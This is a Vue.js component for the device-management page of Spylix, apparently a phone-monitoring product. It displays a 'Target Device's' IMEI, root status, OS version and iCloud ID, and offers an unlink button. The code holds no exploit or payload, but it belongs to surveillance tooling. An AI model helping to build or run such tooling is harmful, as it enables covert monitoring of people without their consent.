<template>
  <div class="fff">
    <div class="title">Device Management</div>
    <div class="system Android" v-if="system == 'Android'">
      <div class="smallTitle">About Target Device</div>
      <img src="@/assets/img/a.png" />
      <div style="overflow: hidden">
        <div class="system_li">
          <span>Device Model:</span>{{ systems.device_model }}
        </div>
        <div class="system_li">
          <span>Mobile Operator Name:</span>{{ systems.operator_name }}
        </div>
        <div class="system_li">
          <span>Android Version:</span>{{ systems.system_version }}
        </div>
        <div class="system_li"><span>IMEI:</span>{{ systems.imei }}</div>
        <div class="system_li">
          <span>Root status:</span>{{ systems.is_root }}
        </div>
        <div class="system_li">
          <span>Internet Connection:</span>{{ systems.internet }}
        </div>
        <div class="system_li"><span>Battery:</span>{{ systems.battery }}</div>
        <div class="system_li">
          <span>Spylix Version:</span>{{ systems.name }}
        </div>
        <div class="system_li">
          <span>Last Updated:</span>{{ systems.last_updated }}
        </div>
      </div>
      <div @click="del()" class="loginButton systemButton">Unlink Device</div>
    </div>
    <div class="system" v-if="system == 'iOS'">
      <div class="smallTitle">Device information</div>
      <img src="@/assets/img/i.png" />
      <div style="overflow: hidden">
        <div class="system_li">
          <span>My iPhone:</span>{{ systems.device_model }}
        </div>
        <div class="system_li">
          <span>Spylix Version:</span>{{ systems.app_version }}
        </div>
        <div class="system_li">
          <span>iOS version:</span>{{ systems.system_version }}
        </div>
      </div>
      <div @click="del()" class="loginButton systemButton">Unlink Device</div>
    </div>
    <div class="system" v-if="system == 'iOS'">
      <div class="smallTitle">iCloud information</div>
      <div style="overflow: hidden">
        <img src="@/assets/img/y.png" />
        <div class="system_li">
          <span>My iPhone:</span>{{ systems.device_model }}
        </div>
        <div class="system_li">
          <span>Last backup update:</span>
          <!-- {{ systems.valid_day }} -->
        </div>
        <div class="system_li">
          <span>iCloud ID:</span>{{ systems.apple_id }}
        </div>
        <div class="system_li">
          <span>Last sync:</span>{{ systems.last_updated }}
        </div>
      </div>
    </div>
  </div>
</template>

<script>
import { indexAccountInfo, EquipmentUnbindDevice } from '@/api/user'
export default {
  inject: ['getheader'],
  name: 'HelloWorld',
  data () {
    return {
      system: localStorage.getItem('system'),
      systems: {
        vip_endtime: '',
        name: '',
        is_auto_renewal: 0,
        device_model: '',
        internet: '',
        Android_version: '',
        spy_version: '',
        battery: ''
      },
      msg: ''
    }
  },
  mounted () {
    indexAccountInfo({ equipment_id: localStorage.getItem('systemId') }).then(
      (adj) => {
        this.systems = adj.data.vipinfo
      }
    )
  },
  methods: {
    del () {
      EquipmentUnbindDevice({
        equipment_id: localStorage.getItem('systemId')
      }).then((adj) => {
        this.getheader()
        this.$router.push({ name: 'index' })
      })
    }
  }
}
</script>

<!-- Add "scoped" attribute to limit CSS to this component only -->
<style scoped>
.smallTitle {
  margin-bottom: 20px;
}
.title {
  font-size: 20px;
  font-weight: 700;
  color: #000927;
  line-height: 100px;
  margin-left: 60px;
}
.system {
  border: 1px solid #e1e3e6;
  border-radius: 12px;
  background: #fff;
  margin-bottom: 20px;
  width: 800px;
  margin-left: 60px;
  overflow: hidden;
  padding-bottom: 40px;
}
.system img {
  float: left;
  width: 40px;
  height: 40px;
  display: block;
  margin-left: 20px;
}
.system_li {
  float: left;
  width: 280px;
  margin-left: 20px;
  font-size: 14px;
  color: #9f9f9f;
  line-height: 20px;
  margin-bottom: 11px;
}
.Android .system_li {
  margin-bottom: 20px;
}
.system_li span {
  float: left;
  color: #3f3f3f;
  /* min-width: 90px; */
  margin-right: 10px;
}
.systemButton {
  float: left;
  width: 186px;
  height: 36px;
  line-height: 36px;
  font-size: 15px;
  margin: 30px 0 0 20px;
}
.fff {
  position: absolute;
  width: 100%;
  height: 100%;
  background: #fff;
}
</style>



// WEBPACK FOOTER //
// src/components/Device.vue